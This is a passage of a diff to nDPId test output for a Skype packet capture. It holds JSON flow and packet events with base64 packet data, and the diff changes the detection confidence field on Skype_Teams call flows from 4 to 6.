00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2ZQAAAEARfiTAqAEinTc4kTLdnFsAImkAnBACXCxecPPKFtdeUw7sQSBvp3gi9mq4vcM="} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+hGcAAEARenXAqAEib91KKzLdnEEAKumHnBICbsOSISjTImKbV\/UiCWod5a6w5EFlZL740jo5mcYkgQ=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1431969665632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969665632,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIpxLw35DcUQuQA256aASOJA7FQAAAgQFrAQCCApOt5+TPiLk6gEDAwk="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1431969665632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665632,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tVZAAEAGo9XAqAEinTeClsN+nEtADbnpQ3FEL4AQECyRaAAAAQEICj4i5cFOt5+T"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QwsAAEARVYDAqAEiQTffLDLdnE0AIF\/DnBQCMyjz3r9eJ18XTFVNiAvxrYpQ3ucg"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA82TgAAEARDlzAqAEinTg0GjLdnFoAKNB4nBYCAAvRN+bFqY3YyxruA93YXf9Qo41EFxKazlLBv\/8="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/\/94AAEARYWbAqAEiQAQXmzLdnEQAK4rqnBgCdE2WfHkd94c\/GZASHmkYP3mRsrUzW7aH679XKkCN7wg="} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3cPYAAEARJ5XAqAEiQTffKTLdnFsAIyQanBoCqUIPvRhVKRfli2TsAPxez+o30kiStRum"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAAy3VkAAEARCjDAqAEinTg0LzLdnF0AHgzhnBwC9HB1yp1CFIBUD5AqeEDWvWy7jA=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667019,"flow_last_seen":1431969667019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969667019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1431969667019,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969667019,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYg5AAEAG9xHAqAEinTeClsOAAbtI+pnpAAAAALAC\/\/+D\/AAAAgQFtAEDAwUBAQgKPiLrJgAAAAAEAgAA"} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1431969667145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969667145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIgG7w4C5VVBeSPqZ6qASOJBi1AAAAgQFrAQCCApOt6EkPiLrJgEDAwk="} 
@@ -397,64 +397,64 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvH9AAEAGnJDAqAEinTeCpsOBnFXYqqHbAAAAALAC\/\/9QDQAAAgQFtAEDAwUBAQgKPiLsxwAAAAAEAgAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9SW0AAEAR5iPAqAEi1cezjTLdnE8AKQ5hnB4CGyqpujGNRC+tNfD9NfpLzFflMbzl80z6vtvIbjHD"} 
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1431969667439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969667439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5JaMAAEARO5vAqAEiQAQXqDLdnEYAJeE7nCAClYKeY8U7yQoFLZ\/n5OmCV2u37neBgVGbscg="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969667439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1431969667440,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969667440,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/+CwAAEAR6vHAqAEinTc4jjLdnFcAKxxKnCIC+gceuOzI36Gk6bxAzIG\/CfJN2Kdzd\/KAG2cg42HExgA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 